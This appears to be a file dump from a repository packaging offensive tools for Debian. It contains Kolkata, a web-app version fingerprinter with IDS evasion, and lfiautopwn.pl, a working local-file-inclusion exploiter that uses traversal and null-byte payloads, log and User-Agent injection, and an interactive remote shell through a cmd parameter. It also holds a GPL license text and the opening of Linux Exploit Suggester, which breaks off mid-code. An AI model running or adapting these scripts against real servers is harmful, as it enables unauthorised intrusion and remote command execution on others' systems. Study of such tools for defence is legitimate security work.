1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | # Source:
4 | Section: net
5 | Priority: extra
6 | Homepage: http://www.blackhatlibrary.net/Kolkata
7 | Standards-Version: 3.9.2
8 |
9 | Package: kolkata
10 | Version: 0.1
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | Depends: perl, libyaml-perl, libwhisker2-perl
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | # Replaces:
18 | Architecture: all
19 | # Copyright:
20 | # Changelog:
21 | # Readme:
22 | # Extra-Files:
23 | Files: kolkata.pl /usr/bin
24 | sigs/joomla.yml /usr/share/doc/kolkata/sigs
25 | sigs/mediawiki.yml /usr/share/doc/kolkata/sigs
26 | sigs/wordpress.yml /usr/share/doc/kolkata/sigs
27 | #
28 | Description: Web application signature fingerprint
29 | Web application fingerprinting engine written in Perl that
30 | combines cryptography with IDS evasion. Kolkata uses session
31 | splicing for IDS evasion and configurable checksums of static
32 | files in order to determine the version of a web application.
33 |
--------------------------------------------------------------------------------
/packages/kolkata/kolkata.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | use strict;
3 | use YAML;
4 | use YAML::XS;
5 | use Digest::MD5 qw(md5_hex);
6 | use LW2;
7 | use Getopt::Std;
8 |
9 | my @apps;
10 | my %opts;
11 |
12 | getopts('c:p:d:v', \%opts);
13 |
14 | usage() unless $opts{d};
15 |
16 | my $domain = $opts{d};
17 | my $verbose = 0;
18 | $verbose = 1 if $opts{v};
19 | my $path = '';
20 | $path = $opts{p} if ($opts{p});
21 |
22 |
23 |
24 | opendir(SIGDIR, "/usr/share/doc/kolkata/sigs/") or die $!;
25 | my @filenames = grep {
26 | /\.yml$/
27 | && -f "/usr/share/doc/kolkata/sigs/$_"
28 | } readdir(SIGDIR);
29 |
30 | my $i = 0;
31 |
32 | foreach my $file (@filenames) {
33 | $apps[$i] = YAML::XS::LoadFile("/usr/share/doc/kolkata/sigs/$file");
34 | $i++;
35 | }
36 |
37 |
38 | foreach my $app (@apps) {
39 | print "Downloading " . $path . $app->{'config'}->{'check_file'} . " to check for " . $app->{'config'}->{'app_name'} . "\n";
40 | my $contents = download($path . $app->{'config'}->{'check_file'}, $domain);
41 | my $target_md5 = md5_hex($contents);
42 | foreach my $sig (keys %{$app->{'sigs'}}) {
43 | print "Comparing $target_md5 with " . $app->{'sigs'}->{$sig} . " for " . $app->{'config'}->{'app_name'} . " " . $sig . " detection.\n" if ($verbose > 0);
44 | die($app->{'config'}->{'app_name'} . " version " . $sig ."\n") if ($app->{'sigs'}->{$sig} eq $target_md5);
45 | }
46 | }
47 |
48 | sub usage {
49 | print "kolkata.pl -d domain.tld [-v -p [remote_path_to_web_application]]\n";
50 | exit(0);
51 | }
52 |
53 | sub download
54 | {
55 | my $uri = shift;
56 | my $try = 5;
57 | my $host = shift;
58 | my %request;
59 | my %response;
60 | LW2::http_init_request(\%request);
61 | $request{'whisker'}->{'method'} = "GET";
62 | $request{'whisker'}->{'host'} = $host;
63 | $request{'whisker'}->{'uri'} = $uri;
64 | $request{'whisker'}->{'encode_anti_ids'} = 9;
65 | $request{'User-Agent'} = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10";
66 | LW2::http_fixup_request(\%request);
67 | if(LW2::http_do_request(\%request, \%response)) {
68 | if($try < 5) {
69 | print "Failed to fetch $uri on try $try. Retrying...\n";
70 | return undef if(!download($uri, $try++));
71 | }
72 | print "Failed to fetch $uri.\n";
73 | return undef;
74 | } else {
75 | return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
76 | }
77 | }
78 |
--------------------------------------------------------------------------------
/packages/kolkata/sigs/joomla.yml:
--------------------------------------------------------------------------------
1 | ---
2 | config:
3 | app_name: Joomla
4 | check_file: /includes/js/joomla.javascript.js
5 | sigs:
6 | 1.0.11: 1d28094f16c310591b855982759bc992
7 | 1.0.14: 9570ccaab7cdac45e6727740515ce69a
8 | 1.0.15: 9570ccaab7cdac45e6727740515ce69a
9 | 1.0.4: 1080567bb801a301e3be618805a55125
10 | 1.0.6: 1080567bb801a301e3be618805a55125
11 | 1.0.8: 222ab5eb9cb8136619053a4f8358b9a5
12 | 1.5.1: b891f61dc9b85a9193592c9d13e9c97a
13 | 1.5.10: 326412fc179cb787500adffada69c4e7
14 | 1.5.11: 326412fc179cb787500adffada69c4e7
15 | 1.5.14: 326412fc179cb787500adffada69c4e7
16 | 1.5.15: 326412fc179cb787500adffada69c4e7
17 | 1.5.4: 326412fc179cb787500adffada69c4e7
18 | 1.5.5: 326412fc179cb787500adffada69c4e7
19 | 1.5.8: 326412fc179cb787500adffada69c4e7
20 | 1.5.9: 326412fc179cb787500adffada69c4e7
21 |
--------------------------------------------------------------------------------
/packages/kolkata/sigs/mediawiki.yml:
--------------------------------------------------------------------------------
1 | ---
2 | config:
3 | app_name: MediaWiki
4 | check_file: /skins/simple/main.css
5 | sigs:
6 | 1.10.0: 31ef23cbcdf689bd68d957ae0d8b8a19
7 | 1.10.2: 31ef23cbcdf689bd68d957ae0d8b8a19
8 | 1.10.3: 31ef23cbcdf689bd68d957ae0d8b8a19
9 | 1.13.0: 6781b4412fbc451b792c4cdc88b0a1fa
10 | 1.13.5: 6781b4412fbc451b792c4cdc88b0a1fa
11 | 1.14.0: 846eec3b6696476a79548b82bf48e492
12 | 1.14.1: 846eec3b6696476a79548b82bf48e492
13 | 1.15.1: b6301262680144f1709d995a6c097db8
14 | 1.5.2: 2fb3891102f9fe2d37a4bdb47b8f42de
15 | 1.5.8: 2fb3891102f9fe2d37a4bdb47b8f42de
16 | 1.8.2: 5d52c4473189e70e4878a5a7b38e3a82
17 | 1.9.2: 24b79f325b32661fd24c93d7d2e8ccef
18 | 1.9.4: 24b79f325b32661fd24c93d7d2e8ccef
19 |
--------------------------------------------------------------------------------
/packages/kolkata/sigs/wordpress.yml:
--------------------------------------------------------------------------------
1 | ---
2 | config:
3 | app_name: Wordpress
4 | check_file: /wp-includes/js/tinymce/tiny_mce.js
5 | sigs:
6 | 2.0: a306a72ce0f250e5f67132dc6bcb2ccb
7 | 2.1: 4f04728cb4631a553c4266c14b9846aa
8 | 2.2: 25e1e78d5b0c221e98e14c6e8c62084f
9 | 2.3: 83c83d0f0a71bd57c320d93e59991c53
10 | 2.5: 7293453cf0ff5a9a4cfe8cebd5b5a71a
11 | 2.6: 61740709537bd19fb6e03b7e11eb8812
12 | 2.7: e6bbc53a727f3af003af272fd229b0b2
13 | 2.8.5: 56c606da29ea9b8f8d823eeab8038ee8
14 | 2.9.1: 128e75ed19d49a94a771586bf83265ec
15 | 3.0.0: 128e75ed19d49a94a771586bf83265ec
16 | 3.0.1: 0711a6aa3862ac0dd2f9ef1a3d26f809
17 | 3.0.2: 0711a6aa3862ac0dd2f9ef1a3d26f809
18 | 3.0.3: 0711a6aa3862ac0dd2f9ef1a3d26f809
19 | 3.0.4: 0711a6aa3862ac0dd2f9ef1a3d26f809
20 | 3.0.5: 0711a6aa3862ac0dd2f9ef1a3d26f809
21 | 3.0.6: 0711a6aa3862ac0dd2f9ef1a3d26f809
22 | 3.1: c67211f73b63e773e626127aa95338c2
23 | 3.1.1: 1786644689f0495f07d5ae1737395108
24 | 3.1.2: 1786644689f0495f07d5ae1737395108
25 | 3.1.3: 1786644689f0495f07d5ae1737395108
26 | 3.1.4: 1786644689f0495f07d5ae1737395108
27 | 3.2: b2c6b6d221c816948248b453046355eb
28 | 3.2.1: b2c6b6d221c816948248b453046355eb
29 | 3.3.1: 9754385dabfc67c8b6d49ad4acba25c3
30 |
--------------------------------------------------------------------------------
/packages/lanspy/lanspy_1.0-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/lanspy/lanspy_1.0-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/lanspy/lanspy_1.0-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: lanspy
3 | Binary: lanspy
4 | Architecture: all
5 | Version: 1.0-1
6 | Maintainer: stderr
7 | Homepage: https://github.com/DanMcInerney/LANs.py
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0), python2.6
10 | Package-List:
11 | lanspy deb net extra
12 | Checksums-Sha1:
13 | 39a2b6514846603431e0fe8409de5d5492b4e3c8 160666 lanspy_1.0.orig.tar.gz
14 | fc277ddc3d5d860b2162669786511d343bc7a5fa 3073 lanspy_1.0-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 267e93d85cb0d2d2059b67b71cdc0d126d843ed22f22650f36b12d4d0c2f6200 160666 lanspy_1.0.orig.tar.gz
17 | 0cc4f517585d4d8244bea4630ba5a2c41fea4a50c8a375197cd6b93185a48fc3 3073 lanspy_1.0-1.debian.tar.gz
18 | Files:
19 | 73268783369234456a6e842fa321e69d 160666 lanspy_1.0.orig.tar.gz
20 | 401ecd419f592226e0cfa20f031a391f 3073 lanspy_1.0-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/lanspy/lanspy_1.0.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/lanspy/lanspy_1.0.orig.tar.gz
--------------------------------------------------------------------------------
/packages/lfiautopwn/lfiautopwn:
--------------------------------------------------------------------------------
1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | #Source:
4 | Section: misc
5 | Priority: extra
6 | Homepage: http://www.blackhatlibrary.net/Lfi_autopwn.pl
7 | Standards-Version: 3.9.2
8 |
9 | Package: lfiautopwn
10 | Version: 0.1
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | Depends: perl, libwhisker2-perl
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | # Replaces:
18 | Architecture: all
19 | # Copyright:
20 | # Changelog:
21 | # Readme:
22 | # Extra-Files:
23 | Files: lfiautopwn.pl /usr/bin/
24 | #
25 | Description: Automated local file inclusion exploiter
26 | Automated local file inclusion exploitation script.
27 | Features:
28 | * Signature-free
29 | * Session Splicing
30 | * User-agent and log injection
31 | * Arithmetic Test
32 |
--------------------------------------------------------------------------------
/packages/lfiautopwn/lfiautopwn.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | use strict;
3 | use Term::ANSIColor;
4 | use Getopt::Std;
5 | use LW2;
6 |
7 | my %opts = ();
8 | getopts('h:u:i:', \%opts);
9 |
10 | usage() unless($opts{u});
11 | usage() unless($opts{h});
12 | usage() unless($opts{i});
13 |
14 | my $input = $opts{i};
15 | my $url = $opts{u};
16 | my $host = $opts{h};
17 |
18 | my $var1 = generate_random_int();
19 | my $var2 = generate_random_int();
20 | my $total = $var1 + $var2;
21 |
22 | my $open = generate_random_string(4);
23 | my $close = generate_random_string(8);
24 |
25 | my $beginning = generate_random_string(6);
26 | my $ending = generate_random_string(4);
27 | my $shell = '';
28 | my $sled = "../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../..";
29 | my @logs = `cat httpdlogs.conf`;
30 | my $test = '';
31 |
32 | # Test for /proc/self/environ && user_agent injection.
33 | my $file = "/proc/self/environ";
34 | test_matches($url,$test,$shell,$file);
35 |
36 | my $lol_error = download($test,$host,"wget/mozilla");
37 | my $lol_shelled = download($shell,$host,"wget/Mozilla");
38 |
39 | foreach my $log (@logs) {
40 | chomp($log);
41 | test_matches($url,"wget/mozilla","wget/mozilla",$log);
42 | }
43 |
44 | sub test_matches {
45 | my $url = shift;
46 | my $test = shift;
47 | my $win = shift;
48 | my $file = shift;
49 |
50 | test_match($url,$test,$win,$file);
51 | test_match($url,$test,$win,"$sled$file");
52 | test_match($url,$test,$win,"$file%00");
53 | test_match($url,$test,$win,"$sled$file%00");
54 | }
55 |
56 | sub test_match {
57 | my $urn = shift;
58 | my $use = shift;
59 | my $win = shift;
60 | my $match = shift;
61 | $urn =~ s/$input=[^\&\?\;]+/$input=$match/g;
62 |
63 | my ($l1,$l2,$l0) = test_rxe(download($urn,$host,$use));
64 | if ($l0 gt 0) {
65 | print color 'bold blue';
66 | print "\r[";
67 | print color 'reset';
68 | print "INFO";
69 | print color 'bold blue';
70 | print "] ";
71 | print color 'red';
72 | print "Successful code execution on $urn\nSpawning shell...\n";
73 | print color 'reset';
74 | spawn_shell($urn,$win);
75 | }
76 | }
77 |
78 | sub spawn_shell {
79 | my $urk = shift;
80 | my $use = shift;
81 |
82 | my $username = parse_rxe(download($urk . "&cmd=whoami",$host,$use),$beginning,$ending);
83 | my $hostname = parse_rxe(download($urk . "&cmd=hostname",$host,$use),$beginning,$ending);
84 | chomp($username);
85 | chomp($hostname);
86 |
87 | while (1) {
88 | print color 'bold green';
89 | print "$username\@$hostname";
90 | print color 'bold blue';
91 | print " \$ ";
92 | print color 'reset';
93 | my $input = <>;
94 | $input =~ s/\ /%20/g;
95 | chomp($input);
96 | print parse_rxe(download($urk . "&cmd=$input",$host,$use),$beginning,$ending);
97 | }
98 | }
99 |
100 | sub parse_rxe {
101 | my $output = shift;
102 | my $begin = shift;
103 | my $end = shift;
104 | my $mangler = generate_random_string(10);
105 | $output =~ s/\n/$mangler/g;
106 | $output =~ /$begin(.+)$end/g;
107 | my $ret = $1;
108 | $ret =~ s/$mangler/\n/g;
109 | return($ret);
110 | }
111 |
112 | sub test_rxe
113 | {
114 | my $output = shift;
115 | if ($output =~ /$open(.*)$close/g) {
116 | my $test_data = $1;
117 | if ($test_data =~ /(.*)$total(.*)/g) {
118 | my $preslack = $1;
119 | my $postslack = $2;
120 | return($preslack,$postslack,1);
121 | }
122 | }
123 | return (0,0,0);
124 | }
125 |
126 | sub download
127 | {
128 | my $uri = shift;
129 | my $try = 5;
130 | my $host = shift;
131 | my $ua = shift;
132 | my %request;
133 | my %response;
134 | LW2::http_init_request(\%request);
135 | $request{'whisker'}->{'method'} = "GET";
136 | $request{'whisker'}->{'host'} = $host;
137 | $request{'whisker'}->{'uri'} = $uri;
138 | $request{'whisker'}->{'encode_anti_ids'} = 9;
139 | $request{'User-Agent'} = $ua;
140 | LW2::http_fixup_request(\%request);
141 | if(LW2::http_do_request(\%request, \%response)) {
142 | if($try < 5) {
143 | print "Failed to fetch $uri on try $try. Retrying...\n";
144 | return undef if(!download($uri, $try++));
145 | }
146 | print "Failed to fetch $uri.\n";
147 | return undef;
148 | } else {
149 | return ($response{'whisker'}->{'data'});
150 | }
151 | }
152 |
153 | sub generate_random_string($)
154 | {
155 | my $len = shift(@_);
156 |
157 | my @chars=('a'..'z','A'..'Z','0'..'9','_');
158 | my $string;
159 | for(my $i = 0; $i < $len; $i++)
160 | {
161 | $string.=$chars[rand(@chars)];
162 | }
163 | return $string;
164 | }
165 |
166 | sub usage()
167 | {
168 | print "perl lfi_autopwn.pl -h [host] -i [vuln input] -u [uri]\n";
169 | exit(1);
170 | }
171 |
172 | sub generate_random_int()
173 | {
174 | my $int = int(rand(500 - 100 + 1)) + 100;
175 | return $int;
176 | }
177 |
178 |
--------------------------------------------------------------------------------
/packages/linux-exploit-suggester/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 2, June 1991
3 |
4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
6 | Everyone is permitted to copy and distribute verbatim copies
7 | of this license document, but changing it is not allowed.
8 |
9 | Preamble
10 |
11 | The licenses for most software are designed to take away your
12 | freedom to share and change it. By contrast, the GNU General Public
13 | License is intended to guarantee your freedom to share and change free
14 | software--to make sure the software is free for all its users. This
15 | General Public License applies to most of the Free Software
16 | Foundation's software and to any other program whose authors commit to
17 | using it. (Some other Free Software Foundation software is covered by
18 | the GNU Lesser General Public License instead.) You can apply it to
19 | your programs, too.
20 |
21 | When we speak of free software, we are referring to freedom, not
22 | price. Our General Public Licenses are designed to make sure that you
23 | have the freedom to distribute copies of free software (and charge for
24 | this service if you wish), that you receive source code or can get it
25 | if you want it, that you can change the software or use pieces of it
26 | in new free programs; and that you know you can do these things.
27 |
28 | To protect your rights, we need to make restrictions that forbid
29 | anyone to deny you these rights or to ask you to surrender the rights.
30 | These restrictions translate to certain responsibilities for you if you
31 | distribute copies of the software, or if you modify it.
32 |
33 | For example, if you distribute copies of such a program, whether
34 | gratis or for a fee, you must give the recipients all the rights that
35 | you have. You must make sure that they, too, receive or can get the
36 | source code. And you must show them these terms so they know their
37 | rights.
38 |
39 | We protect your rights with two steps: (1) copyright the software, and
40 | (2) offer you this license which gives you legal permission to copy,
41 | distribute and/or modify the software.
42 |
43 | Also, for each author's protection and ours, we want to make certain
44 | that everyone understands that there is no warranty for this free
45 | software. If the software is modified by someone else and passed on, we
46 | want its recipients to know that what they have is not the original, so
47 | that any problems introduced by others will not reflect on the original
48 | authors' reputations.
49 |
50 | Finally, any free program is threatened constantly by software
51 | patents. We wish to avoid the danger that redistributors of a free
52 | program will individually obtain patent licenses, in effect making the
53 | program proprietary. To prevent this, we have made it clear that any
54 | patent must be licensed for everyone's free use or not licensed at all.
55 |
56 | The precise terms and conditions for copying, distribution and
57 | modification follow.
58 |
59 | GNU GENERAL PUBLIC LICENSE
60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
61 |
62 | 0. This License applies to any program or other work which contains
63 | a notice placed by the copyright holder saying it may be distributed
64 | under the terms of this General Public License. The "Program", below,
65 | refers to any such program or work, and a "work based on the Program"
66 | means either the Program or any derivative work under copyright law:
67 | that is to say, a work containing the Program or a portion of it,
68 | either verbatim or with modifications and/or translated into another
69 | language. (Hereinafter, translation is included without limitation in
70 | the term "modification".) Each licensee is addressed as "you".
71 |
72 | Activities other than copying, distribution and modification are not
73 | covered by this License; they are outside its scope. The act of
74 | running the Program is not restricted, and the output from the Program
75 | is covered only if its contents constitute a work based on the
76 | Program (independent of having been made by running the Program).
77 | Whether that is true depends on what the Program does.
78 |
79 | 1. You may copy and distribute verbatim copies of the Program's
80 | source code as you receive it, in any medium, provided that you
81 | conspicuously and appropriately publish on each copy an appropriate
82 | copyright notice and disclaimer of warranty; keep intact all the
83 | notices that refer to this License and to the absence of any warranty;
84 | and give any other recipients of the Program a copy of this License
85 | along with the Program.
86 |
87 | You may charge a fee for the physical act of transferring a copy, and
88 | you may at your option offer warranty protection in exchange for a fee.
89 |
90 | 2. You may modify your copy or copies of the Program or any portion
91 | of it, thus forming a work based on the Program, and copy and
92 | distribute such modifications or work under the terms of Section 1
93 | above, provided that you also meet all of these conditions:
94 |
95 | a) You must cause the modified files to carry prominent notices
96 | stating that you changed the files and the date of any change.
97 |
98 | b) You must cause any work that you distribute or publish, that in
99 | whole or in part contains or is derived from the Program or any
100 | part thereof, to be licensed as a whole at no charge to all third
101 | parties under the terms of this License.
102 |
103 | c) If the modified program normally reads commands interactively
104 | when run, you must cause it, when started running for such
105 | interactive use in the most ordinary way, to print or display an
106 | announcement including an appropriate copyright notice and a
107 | notice that there is no warranty (or else, saying that you provide
108 | a warranty) and that users may redistribute the program under
109 | these conditions, and telling the user how to view a copy of this
110 | License. (Exception: if the Program itself is interactive but
111 | does not normally print such an announcement, your work based on
112 | the Program is not required to print an announcement.)
113 |
114 | These requirements apply to the modified work as a whole. If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works. But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 |
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 |
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 |
134 | 3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 |
138 | a) Accompany it with the complete corresponding machine-readable
139 | source code, which must be distributed under the terms of Sections
140 | 1 and 2 above on a medium customarily used for software interchange; or,
141 |
142 | b) Accompany it with a written offer, valid for at least three
143 | years, to give any third party, for a charge no more than your
144 | cost of physically performing source distribution, a complete
145 | machine-readable copy of the corresponding source code, to be
146 | distributed under the terms of Sections 1 and 2 above on a medium
147 | customarily used for software interchange; or,
148 |
149 | c) Accompany it with the information you received as to the offer
150 | to distribute corresponding source code. (This alternative is
151 | allowed only for noncommercial distribution and only if you
152 | received the program in object code or executable form with such
153 | an offer, in accord with Subsection b above.)
154 |
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it. For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable. However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 |
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 |
172 | 4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License. Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 |
180 | 5. You are not required to accept this License, since you have not
181 | signed it. However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works. These actions are
183 | prohibited by law if you do not accept this License. Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 |
189 | 6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions. You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 |
197 | 7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License. If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all. For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 |
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 |
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices. Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 |
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 |
229 | 8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded. In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 |
237 | 9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time. Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 |
242 | Each version is given a distinguishing version number. If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation. If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 |
250 | 10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission. For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this. Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 |
258 | NO WARRANTY
259 |
260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 |
270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 |
280 | END OF TERMS AND CONDITIONS
281 |
282 | How to Apply These Terms to Your New Programs
283 |
284 | If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 |
288 | To do so, attach the following notices to the program. It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 |
293 | Linux Exploit Suggester; based on operating system release number
294 | Copyright (C) 2013 PenturaLabs
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | {signature of Ty Coon}, 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
--------------------------------------------------------------------------------
/packages/linux-exploit-suggester/Linux_Exploit_Suggester.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | use strict;
3 | use warnings;
4 | use Getopt::Std;
5 |
6 | our $VERSION = '0.8';
7 |
8 | my %opts;
9 | getopt( 'k,h', \%opts );
10 | usage() if exists $opts{h};
11 |
12 | my ( $khost, $is_partial ) = get_kernel();
13 | print "\nKernel local: $khost\n\n";
14 |
15 | my %exploits = get_exploits();
16 | print 'Searching among ' . scalar keys(%exploits) . " exploits...\n\n";
17 | print "Possible Exploits:\n";
18 |
19 | EXPLOIT:
20 | foreach my $key ( sort keys %exploits ) {
21 | foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {
22 |
23 | if ( $khost eq $kernel
24 | or ( $is_partial and index($kernel,$khost) == 0 )
25 | ) {
26 | print "[+] $key";
27 | print " ($kernel)" if $is_partial;
28 |
29 | my $alt = $exploits{$key}{alt};
